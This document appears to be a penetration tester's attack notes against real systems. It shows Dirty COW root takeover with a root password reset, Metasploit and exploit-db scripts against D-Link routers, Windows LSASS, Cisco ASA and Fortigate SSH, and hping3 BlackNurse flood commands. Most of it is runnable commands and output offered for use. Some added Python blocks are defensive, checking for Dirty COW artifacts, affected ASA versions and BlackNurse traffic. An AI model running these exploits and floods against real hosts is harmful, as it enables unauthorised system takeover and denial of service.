Take over target Linux using dcow

# mv 40847 40847.cpp
# g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

-copy dcow onto the target Linux host
-log in as a normal user; the root password is changed later
login as: user1
user1@10.0.10.31's password:
$ bash
user1@ubuntu:~$ chmod 755 dcow
user1@ubuntu:~$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak

root@ubuntu:~# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
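
A read-only triage check for the artifacts visible in the session above (/tmp/.ssh_bak, the dirty_writeback_centisecs sysctl and the rewritten /etc/passwd), added here as an example and not part of the original notes or of the exploit. The function names and the sample passwd text are constructed for illustration.

```python
import os

BACKUP_PATH = "/tmp/.ssh_bak"                         # path shown in the session above
WRITEBACK = "/proc/sys/vm/dirty_writeback_centisecs"  # sysctl shown in the session above


def passwd_findings(passwd_text):
    """Flag /etc/passwd entries that fit a rewritten root password field."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue
        name, pw_field, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"extra UID 0 account: {name}")
        # With shadow passwords the field is "x"; "*" and "!" mean locked.
        if uid == "0" and pw_field not in ("x", "*", "!"):
            findings.append(f"{name}: password field held in /etc/passwd")
    return findings


def host_findings(passwd_path="/etc/passwd"):
    """Run the checks against the local host without changing anything."""
    findings = []
    if os.path.exists(BACKUP_PATH):
        findings.append(f"{BACKUP_PATH} exists")
    try:
        with open(WRITEBACK) as fh:
            if fh.read().strip() == "0":
                findings.append("dirty_writeback_centisecs is 0")
    except OSError:
        pass  # not Linux, or /proc not readable
    try:
        with open(passwd_path) as fh:
            findings.extend(passwd_findings(fh.read()))
    except OSError:
        pass
    return findings


# Constructed sample: root's second field carries a hash instead of "x".
SAMPLE = (
    "root:$6$constructed$examplehash:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "user1:x:1000:1000::/home/user1:/bin/bash\n"
)

if __name__ == "__main__":
    for finding in passwd_findings(SAMPLE) + host_findings():
        print(finding)
```

Once the cp and rm steps shown in the session have run, only the sysctl value remains on the host, so shell history and authentication logs are the next place to look.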

DLink router attack

OPTION1:
L: admin
P: TestingR2

OPTION2:

OPTION3:
This is run from the LAN
# msfconsole
msf > use exploit/linux/http/dlink_hnap_login_bof
msf exploit(dlink_hnap_login_bof) > show options
Module options (exploit/linux/http/dlink_hnap_login_bof):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   SHELL     /bin/sh          yes       Don't change this
   SHELLARG  sh               yes       Don't change this
   SLEEP     0.5              yes       Seconds to sleep between requests (ARM only)
   SRVHOST   0.0.0.0          yes       IP address for the HTTP server (ARM only)
   SRVPORT   3333             yes       Port for the HTTP server (ARM only)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   VHOST                      no        HTTP server virtual host
Exploit target:
   Id  Name
   --  ----
   0   Dlink DIR-818 / 822 / 823 / 850 [MIPS]
msf exploit(dlink_hnap_login_bof) > set rhost TARGETIP
msf exploit(dlink_hnap_login_bof) > run

LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

SOURCE:
This attack successfully restarted Windows XP-10 and 2008R2-2012R2
# wget
# unzip 40744
# python Lsass-remote.py targetip
The target Windows host will be restarted

SOLUTION:

Cisco ASA Software 8.x / 9.x – IKEv1 and IKEv2 Buffer Overflow

SOURCE:
RESULT:
-crashed the ASA and forced it to reboot

AFFECTED DEVICE:
Buffer overflow in the IKEv1 and IKEv2 implementations in
-Cisco ASA Software before 8.4(7.30), 8.7 before 8.7(1.18), 9.0 before 9.0(4.38), 9.1 before 9.1(7), 9.2 before 9.2(4.5), 9.3 before 9.3(3.7), 9.4 before 9.4(2.4), and 9.5 before 9.5(2.2) on ASA 5500 devices, ASA 5500-X devices
-ASA Services Module for Cisco Catalyst 6500 and Cisco 7600 devices, ASA 1000V devices
-Adaptive Security Virtual Appliance (aka ASAv), Firepower 9300 ASA Security Module, and ISA 3000
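
A version check built from the affected list above, for comparing a device's reported ASA version against the listed thresholds. It is an added example, not code from the original notes or from Cisco; the function names and result labels are made up here, and it accepts both the 9.1(6.11) form used in the list and the 9.1(6)11 form.

```python
import re

# Thresholds copied from the affected list above: train -> first release
# outside the affected range, as (maintenance, interim).
FIRST_FIXED = {
    (8, 7): (1, 18), (9, 0): (4, 38), (9, 1): (7, 0), (9, 2): (4, 5),
    (9, 3): (3, 7), (9, 4): (2, 4), (9, 5): (2, 2),
}
BEFORE_ANY = (8, 4, 7, 30)  # "before 8.4(7.30)" covers every older release

_VERSION = re.compile(r"(\d+)\.(\d+)\((\d+)(?:\.(\d+))?\)(\d+)?")


def parse_asa_version(text):
    """Return (major, minor, maintenance, interim) found in the text."""
    match = _VERSION.search(text)
    if not match:
        raise ValueError(f"no ASA version found in {text!r}")
    major, minor, maint = (int(match.group(i)) for i in (1, 2, 3))
    interim = int(match.group(4) or match.group(5) or 0)
    return major, minor, maint, interim


def classify(text):
    """Return 'affected', 'not-in-range' or 'train-not-listed'."""
    major, minor, maint, interim = parse_asa_version(text)
    if (major, minor) <= (8, 4):
        older = (major, minor, maint, interim) < BEFORE_ANY
        return "affected" if older else "not-in-range"
    fixed = FIRST_FIXED.get((major, minor))
    if fixed is None:
        return "train-not-listed"  # e.g. 8.5, 8.6 or 9.6+: not on this page
    return "affected" if (maint, interim) < fixed else "not-in-range"


if __name__ == "__main__":
    # Constructed inventory lines for illustration.
    for line in ("Version 9.1(6)11", "Version 9.1(7)", "Version 8.2(5)",
                 "Version 9.6(1)"):
        print(line, "->", classify(line))
```

The check covers the software version only; whether the device model is one of those listed above still has to be confirmed separately.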

VERIFICATION:
-find open ports using Kali Linux
# nmap -v -A 10.0.10.221
open ports are 22 and 443

-download python script from https://www.exploit-db.com/exploits/39823/
# python 39823.py 10.0.10.221 10.0.10.103:443
10.0.10.103 is my PC's IP
443 is the port that we want to attack; we can use port 22 instead

Firewall/Router Attack – BlackNurse

SOURCE: blacknurse.dk

The BlackNurse attack causes high CPU load on the target device

REQUIREMENT:

-Kali linux

Attack (flood works better)
# hping3 -1 -C 3 -K 3 -i u20

# hping3 -1 -C 3 -K 3 --flood

RESULTS:
-Mikrotik v6.37.1 CPU utilization before attack 4%, after attack 44%
-Fortigate 5.2 CPU utilization before attack idle 99%, after attack idle 70%

This attack came from only 1 source. There could be more damage if I used more attack sources
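
Detection logic for the traffic pattern above (ICMP type 3, code 3 arriving at a high rate from one source), added here as an example and not taken from blacknurse.dk or the original notes. The record layout, the one-second window and the threshold of 1000 packets are assumptions to tune per network; the sample records are constructed.

```python
from collections import defaultdict, deque

ICMP_TYPE, ICMP_CODE = 3, 3  # matches -C 3 -K 3 in the hping3 lines above
WINDOW_S = 1.0               # assumed sliding window, in seconds
THRESHOLD = 1000             # assumed packets per window from one source


def blacknurse_sources(records, threshold=THRESHOLD, window=WINDOW_S):
    """records: (timestamp, src_ip, icmp_type, icmp_code), sorted by time.

    Returns {src_ip: peak packets seen in one window} for every source
    that reached the threshold.
    """
    recent = defaultdict(deque)
    peaks = {}
    for ts, src, icmp_type, icmp_code in records:
        if (icmp_type, icmp_code) != (ICMP_TYPE, ICMP_CODE):
            continue
        queue = recent[src]
        queue.append(ts)
        # Drop timestamps that have fallen out of the window.
        while ts - queue[0] > window:
            queue.popleft()
        if len(queue) >= threshold:
            peaks[src] = max(peaks.get(src, 0), len(queue))
    return peaks


def constructed_sample():
    """Constructed records: one flooding source and two quiet ones."""
    # 20 microsecond spacing, as with -i u20 above.
    records = [(i * 20e-6, "192.0.2.10", 3, 3) for i in range(2000)]
    # Occasional port-unreachable replies from a normal host.
    records += [(i * 0.5, "192.0.2.20", 3, 3) for i in range(4)]
    # Busy echo requests: a different ICMP type, so not counted.
    records += [(i * 0.001, "192.0.2.30", 8, 0) for i in range(1500)]
    return sorted(records)


if __name__ == "__main__":
    for src, peak in blacknurse_sources(constructed_sample()).items():
        print(f"{src}: {peak} ICMP type 3 code 3 packets within {WINDOW_S}s")
```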

LIST OF REPORTED AFFECTED PRODUCTS:
-Cisco ASA 5505, 5506, 5515, 5525, 5540 (default settings)
-Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface – 100% CPU load
-Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
-Cisco Router 897 – Can be mitigated – The current code from https://www.cymru.com/Documents/secure-ios-template.html will make evil worse.
-Fortinet v5.4.1 – One CPU consumed
-Fortigate units 60c and 100D (even with drop ICMP on) – RESPONSE FROM FORTINET
-Some unverified Palo Alto – SEE ANSWER FROM PALO ALTO
-Palo Alto 5050 Firewalls with firmware 7.1.4-h2
-SonicWall – Misconfiguration can be changed and mitigated (Enable Anti-DDOS)
-Zyxel NWA3560-N (Wireless attack from LAN Side)
-Zyxel Zywall USG50

NOT AFFECTED:
-AVM Fritz!Box 7360 (common ADSL router in Germany)
-Check Point Security Gateways – Checkpoint response!
-Cisco ISR4321 Router IOS XE – Version 15.5(3)S2, RELEASE SOFTWARE (fc2)
-GigaVUE HC-Serie (Gigamon)
-Iptables
-Juniper SRX
-Mikrotik CCR1036-12G-4S firmware: 3.27 (250 Mbit/sec) and no problem && RouterOS 5.4 on Mikrotik RB750
-OpenBSD 6.0 and current
-pfSense
-Ubiquiti Networks – EdgeRouter Lite CPU 60-70% load but still going
-Windows Firewalls

Fortigate OS 4.x < 5.0.7 – SSH Backdoor

SOURCE: https://www.exploit-db.com/exploits/39224/

This is a remote exploit that allows remote attackers to obtain administrative access via an SSH session

Affected device:
-FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5
-FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8
-FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8

# mv 39224.py fgt_ssh_backdoor.py
# chmod 744 fgt_ssh_backdoor.py
# ./fgt_ssh_backdoor.py targetip